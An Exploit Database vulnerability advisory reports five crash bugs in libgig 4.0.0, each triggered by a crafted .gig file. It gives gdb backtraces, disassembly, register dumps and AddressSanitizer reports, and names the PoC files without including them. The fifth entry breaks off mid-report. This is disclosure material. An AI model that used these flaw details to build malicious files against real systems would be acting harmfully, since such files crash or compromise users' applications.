libgig 4.0.0 (LinuxSampler) – Multiple Vulnerabilities

• Exploit Database
• 95 阅读

• 作者： qflb.wu
  日期： 2017-08-23
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/42546/

• ================
  Author : qflb.wu
  ===============
  
  
  Introduction:
  =============
  https://www.linuxsampler.org/libgig/
  libgig is a C++ library for loading, modifying existing and creating new Gigasampler (.gig) files and DLS (Downloadable Sounds) Level 1/2 files, KORG sample based instruments (.KSF and .KMP files), SoundFont v2 (.sf2) files and AKAI sampler data. 
  
  
  Affected version:
  =====
  4.0.0
  
  
  Vulnerability Description:
  ==========================
  1.
  the gig::Region::Region function in gig.cpp in libgig 4.0.0 can cause a denial of service(Null pointer dereference and application crash) via a crafted gig file.
  
  
  ./gigdump libgig_4.0.0_null_pointer_dereference_1.gig
  
  
  ----debug info:----
  Program received signal SIGSEGV, Segmentation fault.
  0x00007ffff7bc07df in gig::Region::Region (this=0x614ce0, 
  pInstrument=<optimized out>, rgnList=0x610230) at gig.cpp:2970
  2970if (file->pWavePoolTable) pDimensionRegions[i]->pSample = GetSampleFromWavePool(wavepoolindex);
  (gdb) bt
  #00x00007ffff7bc07df in gig::Region::Region (this=0x614ce0, 
  pInstrument=<optimized out>, rgnList=0x610230) at gig.cpp:2970
  #10x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60ef80, 
  pFile=<optimized out>, insList=0x60eea0, pProgress=0x7fffffffdda0)
  at gig.cpp:4404
  #20x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160, 
  pProgress=0x0) at gig.cpp:5576
  #30x00007ffff7bbade6 in gig::File::GetFirstInstrument (
  this=this@entry=0x609160) at gig.cpp:5378
  #40x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
  at gigdump.cpp:205
  #50x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
  at gigdump.cpp:79
  (gdb) disassemble 0x00007ffff7bc07ca,0x00007ffff7bc07f0
  Dump of assembler code from 0x7ffff7bc07ca to 0x7ffff7bc07f0:
   0x00007ffff7bc07ca <gig::Region::Region(gig::Instrument*, RIFF::List*)+666>:je 0x7ffff7bc07e3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+691>
   0x00007ffff7bc07cc <gig::Region::Region(gig::Instrument*, RIFF::List*)+668>:xor%edx,%edx
   0x00007ffff7bc07ce <gig::Region::Region(gig::Instrument*, RIFF::List*)+670>:mov%eax,%esi
   0x00007ffff7bc07d0 <gig::Region::Region(gig::Instrument*, RIFF::List*)+672>:mov%rbx,%rdi
   0x00007ffff7bc07d3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+675>:mov0x138(%r13),%r14
   0x00007ffff7bc07da <gig::Region::Region(gig::Instrument*, RIFF::List*)+682>:callq0x7ffff7b9ede0 <_ZN3gig6Region21GetSampleFromWavePoolEjPN4RIFF10progress_tE@plt>
  => 0x00007ffff7bc07df <gig::Region::Region(gig::Instrument*, RIFF::List*)+687>:mov%rax,0x38(%r14)
   0x00007ffff7bc07e3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+691>:add$0x1,%ebp
   0x00007ffff7bc07e6 <gig::Region::Region(gig::Instrument*, RIFF::List*)+694>:add$0x8,%r13
   0x00007ffff7bc07ea <gig::Region::Region(gig::Instrument*, RIFF::List*)+698>:cmp%ebp,0x130(%rbx)
  End of assembler dump.
  (gdb) i r
  rax0x60ca906343312
  rbx0x614ce06376672
  rcx0x33
  rdx0x60a3006333184
  rsi0x00
  rdi0x6091606328672
  rbp0x00x0
  rsp0x7fffffffdcc00x7fffffffdcc0
  r8 0x00
  r9 0x22
  r100x00
  r110x246582
  r120x6159506379856
  r130x614ce06376672
  r140x00
  r150x00
  rip0x7ffff7bc07df0x7ffff7bc07df <gig::Region::Region(gig::Instrument*, RIFF::List*)+687>
  eflags 0x10246[ PF ZF IF RF ]
  cs 0x3351
  ss 0x2b43
  ds 0x00
  es 0x00
  ---Type <return> to continue, or q <return> to quit---
  fs 0x00
  gs 0x00
  (gdb) 
  
  
  ASAN:SIGSEGV
  =================================================================
  ==40516== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x7f4f87126260 sp 0x7ffd0b22ec80 bp 0x600e0000c3b0 T0)
  AddressSanitizer can not provide additional info.
  #0 0x7f4f8712625f in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970
  #1 0x7f4f87127f4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
  #2 0x7f4f87129fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
  #3 0x7f4f870fb6a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
  #4 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
  #5 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
  #6 0x7f4f86749ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
  #7 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
  SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970 gig::Region::Region(gig::Instrument*, RIFF::List*)
  ==40516== ABORTING
  
  
  POC:
  libgig_4.0.0_null_pointer_dereference_1.gig
  CVE:
  CVE-2017-12950
  
  
  2.
  the gig::DimensionRegion::CreateVelocityTable function in gig.cpp in libgig 4.0.0 can cause a denial of service(stack buffer overflow and application crash) via a crafted gig file.
  
  
  ./gigdump libgig_4.0.0_stack_buffer_overflow.gig
  
  
  ----debug info:----
  Program received signal SIGSEGV, Segmentation fault.
  0x00007ffff7bb8b44 in gig::DimensionRegion::CreateVelocityTable (
  this=<optimized out>, curveType=<optimized out>, depth=<optimized out>, 
  scaling=<optimized out>) at gig.cpp:2884
  2884table[0] = 0;
  (gdb) bt
  #00x00007ffff7bb8b44 in gig::DimensionRegion::CreateVelocityTable (
  this=<optimized out>, curveType=<optimized out>, depth=<optimized out>, 
  scaling=<optimized out>) at gig.cpp:2884
  #10x00007ffff7bbf535 in gig::DimensionRegion::GetVelocityTable (
  this=<optimized out>, curveType=<optimized out>, depth=<optimized out>, 
  scaling=<optimized out>) at gig.cpp:2054
  #20x00007ffff7bbf6f3 in gig::DimensionRegion::GetCutoffVelocityTable (
  this=this@entry=0x60d3f0, vcfVelocityCurve=<optimized out>, 
  vcfVelocityDynamicRange=<optimized out>, vcfVelocityScale=<optimized out>, 
  vcfCutoffController=<optimized out>) at gig.cpp:2042
  #30x00007ffff7bbffa4 in gig::DimensionRegion::DimensionRegion (
  this=0x60d3f0, pParent=<optimized out>, _3ewl=<optimized out>)
  at gig.cpp:1617
  #40x00007ffff7bc0464 in gig::Region::LoadDimensionRegions (
  this=this@entry=0x60c3a0, rgn=rgn@entry=0x60b330) at gig.cpp:3075
  #50x00007ffff7bc05fc in gig::Region::Region (this=0x60c3a0, 
  pInstrument=<optimized out>, rgnList=0x60b330) at gig.cpp:2923
  #60x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60a280, 
  pFile=<optimized out>, insList=0x60a1a0, pProgress=0x7fffffffdd90)
  at gig.cpp:4404
  #70x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160, 
  pProgress=0x0) at gig.cpp:5576
  #80x00007ffff7bbade6 in gig::File::GetFirstInstrument (
  ---Type <return> to continue, or q <return> to quit---
  this=this@entry=0x609160) at gig.cpp:5378
  #90x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
  at gigdump.cpp:205
  #10 0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
  at gigdump.cpp:79
  (gdb) disassemble
  Dump of assembler code for function gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char):
  ...
   0x00007ffff7bb8b27 <+2119>:mov0x2e0(%rsp,%rdx,8),%rsi
   0x00007ffff7bb8b2f <+2127>:je 0x7ffff7bb8c5c <gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)+2428>
   0x00007ffff7bb8b35 <+2133>:movzbl %bpl,%ebx
   0x00007ffff7bb8b39 <+2137>:cvtsi2sd %ebx,%xmm6
   0x00007ffff7bb8b3d <+2141>:movq $0x0,(%rax)
  => 0x00007ffff7bb8b44 <+2148>:mov0x8(%rsi),%edi
   0x00007ffff7bb8b47 <+2151>:lea0x8(%rax),%rcx
  ---Type <return> to continue, or q <return> to quit---
   0x00007ffff7bb8b4b <+2155>:mov0xc(%rsi),%r10d
   0x00007ffff7bb8b4f <+2159>:mov$0x1,%edx
  ...
  (gdb) i r
  rax0x60e0506348880
  rbx0x1420
  rcx0x7ffff7669760140737344083808
  rdx0xfe254
  rsi0x2f736c6f6f742f633419195767971393379
  rdi0x22
  rbp0x00x0
  rsp0x7fffffffd8600x7fffffffd860
  r8 0x60dbc06347712
  r9 0x4064
  r100x7fffffffd9f0140737488345584
  r110x7ffff7bbf601140737349678593
  r120x44
  r130x60d7706346608
  r140x60c3a06341536
  r150x60c3a06341536
  rip0x7ffff7bb8b440x7ffff7bb8b44 <gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)+2148>
  eflags 0x10246[ PF ZF IF RF ]
  cs 0x3351
  ss 0x2b43
  ds 0x00
  es 0x00
  ---Type <return> to continue, or q <return> to quit---
  fs 0x00
  gs 0x00
  (gdb) x/20x $rsi+0x8
  0x2f736c6f6f742f6b:Cannot access memory at address 0x2f736c6f6f742f6b
  (gdb) 
  0x2f736c6f6f742f6f:Cannot access memory at address 0x2f736c6f6f742f6f
  (gdb)
  
  
  ==40504== ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc9ca05fa0 at pc 0x7fbea070c58b bp 0x7ffc9ca051c0 sp 0x7ffc9ca051b8
  READ of size 8 at 0x7ffc9ca05fa0 thread T0
  #0 0x7fbea070c58a in gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2881
  #1 0x7fbea0743964 in gig::DimensionRegion::GetVelocityTable(gig::curve_type_t, unsigned char, unsigned char) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2054
  #2 0x7fbea0747739 in gig::DimensionRegion::DimensionRegion(gig::Region*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:1617
  #3 0x7fbea074bfda in gig::Region::LoadDimensionRegions(RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:3075
  #4 0x7fbea074c7d7 in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2923
  #5 0x7fbea074ef4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
  #6 0x7fbea0750fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
  #7 0x7fbea07226a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
  #8 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
  #9 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
  #10 0x7fbe9fd70ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
  #11 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
  Address 0x7ffc9ca05fa0 is located at offset 144 in frame <PrintInstruments> of T0's stack:
  This frame has 2 object(s):
  [32, 40) 'name'
  [96, 104) 'name'
  HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
  (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow /home/a/Documents/libgig-4.0.0/src/gig.cpp:2877 gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)
  Shadow bytes around the buggy address:
  0x100013938ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938bb0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
  0x100013938bc0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938be0: 00 00 f1 f1 f1 f1 00 f4 f4 f4 f2 f2 f2 f2 00 f4
  =>0x100013938bf0: f4 f4 f3 f3[f3]f3 00 00 00 00 00 00 00 00 00 00
  0x100013938c00: 00 00 f1 f1 f1 f1 00 00 f4 f4 f3 f3 f3 f3 00 00
  0x100013938c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable: 00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone: fa
  Heap righ redzone: fb
  Freed Heap region: fd
  Stack left redzone:f1
  Stack mid redzone: f2
  Stack right redzone: f3
  Stack partial redzone: f4
  Stack after return:f5
  Stack use after scope: f8
  Global redzone:f9
  Global init order: f6
  Poisoned by user:f7
  ASan internal: fe
  ==40504== ABORTING
  
  
  POC:
  libgig_4.0.0_stack_buffer_overflow.gig
  CVE:
  CVE-2017-12951
  
  
  3.
  the LoadString function in helper.h in libgig 4.0.0 can cause a denial of service(Null pointer dereference and application crash) via a crafted gig file.
  
  
  ./gigdump libgig_4.0.0_null_pointer_dereference_2.gig
  
  
  ----debug info:----
  Program received signal SIGSEGV, Segmentation fault.
  LoadString (s="", ck=0x6095d0) at helper.h:148
  148if (str[len] == '\0') break;
  (gdb) bt
  #0LoadString (s="", ck=0x6095d0) at helper.h:148
  #1DLS::Info::LoadString (ChunkID=ChunkID@entry=1146241865, 
  lstINFO=lstINFO@entry=0x609330, s="") at DLS.cpp:307
  #20x00007ffff7ba8095 in DLS::Info::Info (this=0x609220, list=<optimized out>)
  at DLS.cpp:263
  #30x00007ffff7ba8448 in DLS::Resource::Resource (this=this@entry=0x609160, 
  Parent=Parent@entry=0x0, lstResource=lstResource@entry=0x609090)
  at DLS.cpp:448
  #40x00007ffff7baaa02 in DLS::File::File (this=0x609160, pRIFF=0x609090)
  at DLS.cpp:1435
  #50x00007ffff7bbab2e in gig::File::File (this=0x609160, 
  pRIFF=<optimized out>) at gig.cpp:5201
  #60x0000000000401ee4 in main (argc=<optimized out>, argv=<optimized out>)
  at gigdump.cpp:70
  (gdb) disassemble 
  Dump of assembler code for function DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&):
   0x00007ffff7ba7f30 <+0>:push %rbp
   0x00007ffff7ba7f31 <+1>:mov%edi,%eax
   0x00007ffff7ba7f33 <+3>:mov%rsi,%rdi
   0x00007ffff7ba7f36 <+6>:mov%eax,%esi
   0x00007ffff7ba7f38 <+8>:push %rbx
   0x00007ffff7ba7f39 <+9>:mov%rdx,%rbx
   0x00007ffff7ba7f3c <+12>:sub$0x8,%rsp
   0x00007ffff7ba7f40 <+16>:callq0x7ffff7b9ed80 <_ZN4RIFF4List11GetSubChunkEj@plt>
   0x00007ffff7ba7f45 <+21>:test %rax,%rax
   0x00007ffff7ba7f48 <+24>:mov%rax,%rbp
   0x00007ffff7ba7f4b <+27>:je 0x7ffff7ba7fa8 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+120>
   0x00007ffff7ba7f4d <+29>:mov%rax,%rdi
   0x00007ffff7ba7f50 <+32>:callq0x7ffff7b9e3e0 <_ZN4RIFF5Chunk13LoadChunkDataEv@plt>
   0x00007ffff7ba7f55 <+37>:mov0xc(%rbp),%r10d
   0x00007ffff7ba7f59 <+41>:mov%rax,%rsi
   0x00007ffff7ba7f5c <+44>:test %r10d,%r10d
   0x00007ffff7ba7f5f <+47>:jle0x7ffff7ba7faf <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+127>
  ---Type <return> to continue, or q <return> to quit---
  => 0x00007ffff7ba7f61 <+49>:cmpb $0x0,(%rax)
   0x00007ffff7ba7f64 <+52>:je 0x7ffff7ba7faf <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+127>
   0x00007ffff7ba7f66 <+54>:mov$0x1,%r9d
   0x00007ffff7ba7f6c <+60>:xor%ecx,%ecx
   0x00007ffff7ba7f6e <+62>:jmp0x7ffff7ba7f7e <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+78>
   0x00007ffff7ba7f70 <+64>:cmpb $0x0,(%rsi,%r9,1)
   0x00007ffff7ba7f75 <+69>:lea0x1(%r9),%r8
   0x00007ffff7ba7f79 <+73>:je 0x7ffff7ba7fa0 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+112>
   0x00007ffff7ba7f7b <+75>:mov%r8,%r9
   0x00007ffff7ba7f7e <+78>:add$0x1,%ecx
   0x00007ffff7ba7f81 <+81>:cmp%r10d,%ecx
   0x00007ffff7ba7f84 <+84>:jne0x7ffff7ba7f70 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+64>
   0x00007ffff7ba7f86 <+86>:movslq %ecx,%rdx
   0x00007ffff7ba7f89 <+89>:mov%rbx,%rdi
   0x00007ffff7ba7f8c <+92>:callq0x7ffff7b9f030 <_ZNSs6assignEPKcm@plt>
   0x00007ffff7ba7f91 <+97>:add$0x8,%rsp
   0x00007ffff7ba7f95 <+101>:mov%rbp,%rdi
   0x00007ffff7ba7f98 <+104>:pop%rbx
   0x00007ffff7ba7f99 <+105>:pop%rbp
  ---Type <return> to continue, or q <return> to quit---q
  Quit
  (gdb) i r
  rax0x00
  rbx0x6092386328888
  rcx0x7ffff739f9f7140737341159927
  rdx0x7ffff5d9f000140737318088704
  rsi0x00
  rdi0x7ffff5d9f000140737318088704
  rbp0x6095d00x6095d0
  rsp0x7fffffffdd800x7fffffffdd80
  r8 0xffffffff4294967295
  r9 0x00
  r100x100001a16777242
  r110x247583
  r120x6092206328864
  r130x7fffffffdfa0140737488347040
  r140x00
  r150x6091a06328736
  rip0x7ffff7ba7f610x7ffff7ba7f61 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+49>
  eflags 0x10202[ IF RF ]
  cs 0x3351
  ss 0x2b43
  ds 0x00
  es 0x00
  ---Type <return> to continue, or q <return> to quit---
  fs 0x00
  gs 0x00
  (gdb)
  
  
  ASAN:SIGSEGV
  =================================================================
  ==41244== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f260c0db52b sp 0x7fffc62477e0 bp 0x600e0000ded0 T0)
  AddressSanitizer can not provide additional info.
  #0 0x7f260c0db52a in LoadString /home/a/Documents/libgig-4.0.0/src/helper.h:148
  #1 0x7f260c0db52a in DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:307
  #2 0x7f260c0dbfcb in DLS::Info::Info(RIFF::List*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:263
  #3 0x7f260c0dcf82 in DLS::Resource::Resource(DLS::Resource*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:448
  #4 0x7f260c0ee958 in DLS::File::File(RIFF::File*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:1435
  #5 0x7f260c173e75 in gig::File::File(RIFF::File*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5201
  #6 0x40275a in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:70
  #7 0x7f260b7c3ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
  #8 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
  SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/helper.h:148 LoadString
  ==41244== ABORTING
  
  
  POC:
  libgig_4.0.0_null_pointer_dereference_2.gig
  CVE:
  CVE-2017-12952
  
  
  4.
  the gig::Instrument::UpdateRegionKeyTable function in gig.cpp in libgig 4.0.0 can cause a denial of service(invalid memory write and application crash) via a crafted gig file.
  
  
  ./gigdump libgig_4.0.0_invalid_memory_write.gig
  
  
  ----debug info:----
  Program received signal SIGSEGV, Segmentation fault.
  gig::Instrument::UpdateRegionKeyTable (this=this@entry=0x60a1a0) at gig.cpp:4445
  4445RegionKeyTable[iKey] = pRegion;
  (gdb) bt
  #0gig::Instrument::UpdateRegionKeyTable (this=this@entry=0x60a1a0)
  at gig.cpp:4445
  #10x00007ffff7bc0b75 in gig::Instrument::Instrument (this=0x60a1a0, 
  pFile=<optimized out>, insList=0x60a0c0, pProgress=0x7fffffffdd90)
  at gig.cpp:4409
  #20x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160, 
  pProgress=0x0) at gig.cpp:5576
  #30x00007ffff7bbade6 in gig::File::GetFirstInstrument (
  this=this@entry=0x609160) at gig.cpp:5378
  #40x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
  at gigdump.cpp:205
  #50x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
  at gigdump.cpp:79
  (gdb) disassemble 
  Dump of assembler code for function gig::Instrument::UpdateRegionKeyTable():
   0x00007ffff7bba240 <+0>:xor%eax,%eax
   0x00007ffff7bba242 <+2>:nopw 0x0(%rax,%rax,1)
   0x00007ffff7bba248 <+8>:movq $0x0,0x80(%rdi,%rax,1)
   0x00007ffff7bba254 <+20>:add$0x8,%rax
   0x00007ffff7bba258 <+24>:cmp$0x400,%rax
   0x00007ffff7bba25e <+30>:jne0x7ffff7bba248 <gig::Instrument::UpdateRegionKeyTable()+8>
   0x00007ffff7bba260 <+32>:mov0x60(%rdi),%r9
   0x00007ffff7bba264 <+36>:mov(%r9),%r8
   0x00007ffff7bba267 <+39>:cmp%r9,%r8
   0x00007ffff7bba26a <+42>:je 0x7ffff7bba2a4 <gig::Instrument::UpdateRegionKeyTable()+100>
   0x00007ffff7bba26c <+44>:nopl 0x0(%rax)
   0x00007ffff7bba270 <+48>:mov0x10(%r8),%rcx
   0x00007ffff7bba274 <+52>:movzwl 0x78(%rcx),%eax
   0x00007ffff7bba278 <+56>:movzwl 0x7a(%rcx),%esi
   0x00007ffff7bba27c <+60>:cmp%esi,%eax
   0x00007ffff7bba27e <+62>:jg 0x7ffff7bba29a <gig::Instrument::UpdateRegionKeyTable()+90>
   0x00007ffff7bba280 <+64>:add$0x1,%esi
   0x00007ffff7bba283 <+67>:nopl 0x0(%rax,%rax,1)
   0x00007ffff7bba288 <+72>:movslq %eax,%rdx
  ---Type <return> to continue, or q <return> to quit---
   0x00007ffff7bba28b <+75>:add$0x1,%eax
   0x00007ffff7bba28e <+78>:cmp%esi,%eax
  => 0x00007ffff7bba290 <+80>:mov%rcx,0x80(%rdi,%rdx,8)
   0x00007ffff7bba298 <+88>:jne0x7ffff7bba288 <gig::Instrument::UpdateRegionKeyTable()+72>
   0x00007ffff7bba29a <+90>:mov(%r8),%r8
   0x00007ffff7bba29d <+93>:cmp%r8,%r9
   0x00007ffff7bba2a0 <+96>:jne0x7ffff7bba270 <gig::Instrument::UpdateRegionKeyTable()+48>
   0x00007ffff7bba2a2 <+98>:repz retq 
   0x00007ffff7bba2a4 <+100>:repz retq 
  End of assembler dump.
  (gdb) i r
  rax0x3fbd16317
  rbx0x60a1a06332832
  rcx0x60d5806346112
  rdx0x3fbc16316
  rsi0x420116897
  rdi0x60a1a06332832
  rbp0x7fffffffdd900x7fffffffdd90
  rsp0x7fffffffdd080x7fffffffdd08
  r8 0x60e7406350656
  r9 0x60b0f06336752
  r100x7fffffffdad0140737488345808
  r110x7ffff7bba240140737349657152
  r120x00
  r130x60a0c06332608
  r140x60a9806334848
  r150x60d5806346112
  rip0x7ffff7bba2900x7ffff7bba290 <gig::Instrument::UpdateRegionKeyTable()+80>
  eflags 0x10283[ CF SF IF RF ]
  cs 0x3351
  ss 0x2b43
  ds 0x00
  es 0x00
  ---Type <return> to continue, or q <return> to quit---
  fs 0x00
  gs 0x00
  (gdb)
  
  
  ASAN:SIGSEGV
  =================================================================
  ==43045== ERROR: AddressSanitizer: SEGV on unknown address 0x60460003dd80 (pc 0x7fb8f7cfcd88 sp 0x7ffcb179db10 bp 0x60460001f500 T0)
  AddressSanitizer can not provide additional info.
  #0 0x7fb8f7cfcd87 in gig::Instrument::UpdateRegionKeyTable() /home/a/Documents/libgig-4.0.0/src/gig.cpp:4444
  #1 0x7fb8f7d2efe2 in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4409
  #2 0x7fb8f7d30fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
  #3 0x7fb8f7d026a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
  #4 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
  #5 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
  #6 0x7fb8f7350ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
  #7 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
  SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:4445 gig::Instrument::UpdateRegionKeyTable()
  ==43045== ABORTING
  
  
  POC:
  libgig_4.0.0_invalid_memory_write.gig
  CVE:
  CVE-2017-12953
  
  
  5.
  the gig::Region::GetSampleFromWavePool function in gig.cpp in gig.cpp in libgig 4.0.0 can cause a denial of service(invalid memory read and application crash) via a crafted gig file.
  
  
  ./gigdump libgig_4.0.0_invalid_memory_read.gig
  
  
  ----debug info:----
  Program received signal SIGSEGV, Segmentation fault.
  gig::Region::GetSampleFromWavePool (this=0x609160, this@entry=0x612520, 
  WavePoolTableIndex=0, pProgress=pProgress@entry=0x0) at gig.cpp:3849
  3849unsigned long soughtoffset = file->pWavePoolTable[WavePoolTableIndex];
  (gdb) bt
  #0gig::Region::GetSampleFromWavePool (this=0x609160, this@entry=0x612520, 
  WavePoolTableIndex=0, pProgress=pProgress@entry=0x0) at gig.cpp:3849
  #10x00007ffff7bc07df in gig::Region::Region (this=0x612520, 
  pInstrument=<optimized out>, rgnList=0x6100f0) at gig.cpp:2970
  #20x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60ef80, 
  pFile=<optimized out>, insList=0x60eea0, pProgress=0x7fffffffdd90)
  at gig.cpp:4404
  #30x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160, 
  pProgress=0x0) at gig.cpp:5576
  #40x00007ffff7bbade6 in gig::File::GetFirstInstrument (
  this=this@entry=0x609160) at gig.cpp:5378
  #50x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
  at gigdump.cpp:205
  #60x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
  at gigdump.cpp:79
  (gdb) disassemble 
  Dump of assembler code for function gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*):
   0x00007ffff7bbac00 <+0>:cmp$0xffffffff,%esi
   0x00007ffff7bbac03 <+3>:je 0x7ffff7bbac63 <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+99>
   0x00007ffff7bbac05 <+5>:push %r12
   0x00007ffff7bbac07 <+7>:push %rbp
   0x00007ffff7bbac08 <+8>:push %rbx
   0x00007ffff7bbac09 <+9>:mov0x18(%rdi),%rax
   0x00007ffff7bbac0d <+13>:mov0x18(%rax),%rbx
   0x00007ffff7bbac11 <+17>:mov0x78(%rbx),%rax
   0x00007ffff7bbac15 <+21>:test %rax,%rax
   0x00007ffff7bbac18 <+24>:je 0x7ffff7bbac5c <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+92>
   0x00007ffff7bbac1a <+26>:mov%esi,%ecx
   0x00007ffff7bbac1c <+28>:mov%rbx,%rdi
   0x00007ffff7bbac1f <+31>:mov%rdx,%rsi
  => 0x00007ffff7bbac22 <+34>:mov(%rax,%rcx,4),%ebp
   0x00007ffff7bbac25 <+37>:mov0x80(%rbx),%rax
   0x00007ffff7bbac2c <+44>:mov(%rax,%rcx,4),%r12d
   0x00007ffff7bbac30 <+48>:callq0x7ffff7b9e400 <_ZN3gig4File14GetFirstSampleEPN4RIFF10progress_tE@plt>
   0x00007ffff7bbac35 <+53>:test %rax,%rax
  ---Type <return> to continue, or q <return> to quit---q
  Quit
  (gdb) i r
  rax0x609f806332288
  rbx0x6091606328672
  rcx0xff0000004278190080
  rdx0x00
  rsi0x00
  rdi0x6091606328672
  rbp0x00x0
  rsp0x7fffffffdc900x7fffffffdc90
  r8 0x00
  r9 0x22
  r100x00
  r110x246582
  r120x6131906369680
  r130x6125206366496
  r140x00
  r150x00
  rip0x7ffff7bbac220x7ffff7bbac22 <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+34>
  eflags 0x10202[ IF RF ]
  cs 0x3351
  ss 0x2b43
  ds 0x00
  es 0x00
  ---Type <return> to continue, or q <return> to quit---
  fs 0x00
  gs 0x00
  (gdb)
  
  
  ASAN:SIGSEGV
  =================================================================
